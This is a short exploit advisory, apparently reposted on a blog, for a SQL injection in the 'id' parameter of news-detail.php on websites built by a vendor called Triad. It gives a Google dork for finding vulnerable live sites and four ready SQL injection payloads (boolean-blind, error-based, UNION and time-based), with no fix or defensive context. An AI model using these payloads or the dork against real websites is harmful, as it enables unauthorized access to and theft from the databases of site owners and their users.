_ _ _
_ __ _ _| |__ ___ _ __ | (_)_ __ _ ___ __
| '__| | | | '_ \ / _ \ '_ \ | | | '_ \| | | \ \/ /
| | | |_| | |_) | __/ | | | | | | | | | |_| |> <
|_| \__,_|_.__/ \___|_| |_|___|_|_|_| |_|\__,_/_/\_\
|_____|
# Exploit Title: SQL Injection
#
# Google Dork: "Website Created and Hosted By Triad"
#
# Date: 5/9/12
#
# Author: ruben_linux
#
# Site : http://arealinux(dot)blogspot(dot)com(dot)es
# http://www(dot)youtube(dot)com/user/rubenlinux
==================================
Files affected : news-detail.php
parameter: id
==================
PoC-Exploit
==================
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5' AND 6992=6992 AND 'kaiM'='kaiM
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=5' AND (SELECT 8596 FROM(SELECT
COUNT(*),CONCAT(0x3a6974713a,(SELECT (CASE WHEN (8596=8596) THEN 1 ELSE 0
END)),0x3a6a6c763a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PzcT'='PzcT
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: id=5' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL,
CONCAT(0x3a6974713a,0x4c6b50577255634a4c52,0x3a6a6c763a), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=5' AND SLEEP(5) AND 'wZaG'='wZaG
[+] http://www.******.com/news-detail.php?id=5[SQLi]
http://packetstormsecurity.org/files/116228/Website-Created-By-Triad-SQL-Injection.html
No hay comentarios:
Publicar un comentario